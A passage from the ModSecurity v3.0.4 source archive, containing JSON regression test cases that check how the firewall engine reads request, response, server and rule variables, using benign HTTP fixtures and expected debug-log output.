"Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "User-Agent":"My sweet little browser", "Cookie": "PHPSESSID=whee" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setsid:%{REQUEST_COOKIES:PHPSESSID}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:SESSION.score=+10\"", "SecRule SESSIONID \".*\" \"id:1239,phase:1,log,pass\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-SERVER_PORT.json0000644000175000017500000000371113607066010026250 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: SERVER_PORT", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"80\" \\(Variable: SERVER_PORT\\)" }, "rules":[ "SecRuleEngine On", "SecRule SERVER_PORT \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: SERVER_PORT", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"::1", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"80\" \\(Variable: SERVER_PORT\\)" }, "rules":[ "SecRuleEngine On", "SecRule SERVER_PORT \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-SERVER_NAME.json0000644000175000017500000000363513607066010026211 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: SERVER_NAME (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "protocol": "HTTP/1.1", "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"localhost\" \\(Variable: SERVER_NAME\\)" }, "rules":[ "SecRuleEngine On", "SecRule SERVER_NAME \"^HTTP\" \"id:1,phase:5,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: SERVER_NAME (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"www.zimmerle.org:4443", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "protocol": "HTTP/1.1", "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"www.zimmerle.org\" \\(Variable: SERVER_NAME\\)" }, "rules":[ "SecRuleEngine On", "SecRule SERVER_NAME \"^HTTP\" \"id:1,phase:5,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-SERVER_ADDR.json0000644000175000017500000000372513607066010026203 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: SERVER_ADDR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"200.249.12.11\" \\(Variable: SERVER_ADDR\\)" }, "rules":[ "SecRuleEngine On", "SecRule SERVER_ADDR \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: SERVER_ADDR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"::1", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"::1\" \\(Variable: SERVER_ADDR\\)" }, "rules":[ "SecRuleEngine On", "SecRule SERVER_ADDR \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-RULE.json0000644000175000017500000001610613607066010025147 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: RULE (1/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"1\" \\(Variable: RULE:id\\)" }, "rules":[ "SecRuleEngine On", "SecRule RULE:id \"@contains test\" \"id:1,phase:3,rev:1.3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: RULE (2/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"200\" \\(Variable: RULE:rev\\)" }, "rules":[ "SecRuleEngine On", "SecRule RULE:rev \"@contains test\" \"id:1,rev:200,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: RULE (3/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"2\" \\(Variable: RULE:severity\\)" }, "rules":[ "SecRuleEngine On", "SecRule RULE:severity \"@contains test\" \"id:1,phase:3,severity:critical,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: RULE (4/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"data123\" \\(Variable: RULE:logdata\\)" }, "rules":[ "SecRuleEngine On", "SecRule RULE:logdata \"@contains test\" \"id:1,logdata:'data123',phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: RULE (5/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":" Target value: \"message123\" \\(Variable: RULE:msg\\)" }, "rules":[ "SecRuleEngine On", "SecRule RULE:msg \"@contains test\" \"id:1,msg:'message123',phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: RULE (6/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":" Target value: \"message123\" \\(Variable: RULE:msg\\)" }, "rules":[ "SecRuleEngine On", "SecRule rule:msg \"@contains test\" \"id:1,msg:'message123',phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: RULE (7/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Saving variable: IP:block_reason with value: message123" }, "rules":[ "SecRuleEngine On", "SecRule rule:msg \"@contains message\" \"id:1,msg:'message123',setvar:'ip.block_reason=%{RULE.msg}%',phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-RESPONSE_PROTOCOL.json0000644000175000017500000000172313607066010027156 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: RESPONSE_PROTOCOL", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "protocol": "HTTP/1.1", "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"HTTP/1.1\" \\(Variable: RESPONSE_PROTOCOL\\)" }, "rules":[ "SecRuleEngine On", "SecRule RESPONSE_PROTOCOL \"^HTTP\" \"id:1,phase:5,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-RESPONSE_HEADERS_NAMES.json0000644000175000017500000001241213607066010027710 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: RESPONSE_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "Target value: \"Date\" \\(Variable: RESPONSE_HEADERS_NAMES:Date\\)" }, "rules":[ "SecRuleEngine On", "SecRule RESPONSE_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: RESPONSE_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "Target value: \"Last-Modified\" \\(Variable: RESPONSE_HEADERS_NAMES:Last-Modified\\)" }, "rules":[ "SecRuleEngine On", "SecRule RESPONSE_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: RESPONSE_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "Target value: \"Content-Type\" \\(Variable: RESPONSE_HEADERS_NAMES:Content-Type\\)" }, "rules":[ "SecRuleEngine On", "SecRule RESPONSE_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-RESPONSE_HEADERS.json0000644000175000017500000000343013607066010026765 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: RESPONSE_HEADERS", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Mon, 13 Jul 2015 20:02:41 GMT\" \\(Variable: RESPONSE_HEADERS:Date\\)" }, "rules":[ "SecRuleEngine On", "SecRule RESPONSE_HEADERS \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-RESPONSE_CONTENT_TYPE.json0000644000175000017500000000171413607066010027670 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: RESPONSE_CONTENT_TYPE", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"text/html\" \\(Variable: RESPONSE_CONTENT_TYPE\\)" }, "rules":[ "SecRuleEngine On", "SecRule RESPONSE_CONTENT_TYPE \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json0000644000175000017500000000175413607066010030074 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: RESPONSE_CONTENT_LENGTH", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"9\" \\(Variable: RESPONSE_CONTENT_LENGTH\\)" }, "rules":[ "SecRuleEngine On", "SecResponseBodyAccess On", "SecRule RESPONSE_CONTENT_LENGTH \"@contains test \" \"id:1,phase:4,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-RESPONSE_BODY.json0000644000175000017500000000131713607066010026451 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: RESPONSE_BODY", "client": { "ip":"200.249.12.31" }, "request": { "headers": { "Host":"localhost" }, "uri":"/foo", "http_version":1.1 }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/plain" }, "body":[ "denystring" ] }, "expected":{ "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecResponseBodyAccess On", "SecRule RESPONSE_BODY \"@contains denystring\" \"id:1,phase:4,deny\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_URI_RAW.json0000644000175000017500000000171013607066010026753 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_URI_RAW", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"/\\?key=value\\&key=other_value\" \\(Variable: REQUEST_URI_RAW\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_URI_RAW \"@contains test \" \"id:1,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_URI.json0000644000175000017500000000167413607066010026253 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_URI", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"/\\?key=value\\&key=other_value\" \\(Variable: REQUEST_URI\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_URI \"@contains test \" \"id:1,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_PROTOCOL.json0000644000175000017500000000166413607066010027054 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_PROTOCOL", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"HTTP/1.1\" \\(Variable: REQUEST_PROTOCOL\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_PROTOCOL \"@contains test \" \"id:1,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_METHOD.json0000644000175000017500000000165113607066010026567 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_METHOD", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"GET\" \\(Variable: REQUEST_METHOD\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_METHOD \"@contains test \" \"id:1,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_LINE.json0000644000175000017500000000171413607066010026336 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_LINE", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET", "http_version":1.1 }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"GET /\\?key=value\\&key=other_value HTTP/1.1\" \\(Variable: REQUEST_LINE\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_LINE \"@contains test \" \"id:1,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_HEADERS_NAMES.json0000644000175000017500000002475513607066010027617 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Host\" \\(Variable: REQUEST_HEADERS_NAMES:Host\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"User-Agent\" \\(Variable: REQUEST_HEADERS_NAMES:User-Agent\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", 